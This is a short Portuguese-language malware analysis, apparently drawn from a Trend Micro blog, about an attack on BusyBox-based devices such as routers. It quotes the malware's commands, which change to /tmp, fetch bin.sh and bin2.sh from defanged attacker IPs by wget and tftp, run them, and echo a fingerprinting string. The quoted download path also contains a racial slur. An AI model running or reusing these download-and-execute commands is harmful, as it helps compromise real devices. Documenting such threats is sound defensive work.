Uma vez que uma conexão é estabelecida, ele executa o comando para baixar e executar scripts bin.sh e bin2.sh, ganhando o controle sobre o sistema Busybox. Para quem não sabe, BusyBox é construído em cima do kernel do Linux e usado por pequenos dispositivos, como roteadores. Neste cenário, atacantes remotos podem maximizar seu controle nos dispositivos, afetados pela implantação de outros componentes ou por software malicioso atrelado ao sistema, em função da sua motivação. Isto é visto nas seguintes comandos:
cd /tmp
busybox wget http://69[.]163[.]37[.]115/.niggers/bin.sh
busybox tftp -r bin.sh -g 69[.1]63[.]37[.]115
sh bin.sh
echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74′\r\n
cd /tmp/
busybox wget http://176[.]10[.]250[.]37/.niggers/bin2.sh
busybox tftp -r bin2.sh -g 176[.]10[.]250[.]37
sh bin2.sh
echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74′\r\n
Isso significa que o malware pode executar os seguintes comandos nos dispositivos afetados:
- Mudar para a pasta temporária, onde geralmente não há acesso ao arquivo de gravação;
- Baixar um arquivo remoto, dependendo se o script shell está hospedado via HTTP ou TFTP. Não há mecanismo de "fail-safe" para conseguir sua rotina de download. Isso significa que, se no primeiro comando ele não executar qualquer arquivo, tentará novamente se conectar à URL com a intenção de baixar o arquivo;
- Executar o script shell baixado;
- Realizar uma rotina de "fingerprinting", para verificar se o dispositivo funciona com o sistema BusyBox.
Saiba Mais:
[1] Blog Trend Micro http://blog.trendmicro.com/trendlabs...ng-on-busybox/